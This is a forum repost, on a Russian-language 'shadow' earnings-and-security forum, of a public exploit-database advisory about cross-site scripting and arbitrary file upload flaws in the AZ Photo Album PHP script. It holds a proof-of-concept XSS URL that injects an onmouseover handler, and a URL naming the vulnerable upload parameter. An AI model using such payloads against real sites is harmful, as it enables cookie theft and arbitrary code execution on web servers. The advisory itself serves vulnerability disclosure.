AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 37283

Проверка EDB

Пройдено

Автор: EYUP CELIK

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2012-05-20

AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload

Код:

source: https://www.securityfocus.com/bid/53641/info

The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.

Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks. 

http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20

http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest

Источник: www.exploit-db.com

Поиск

Exploit AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload

Exploiter

Похожие темы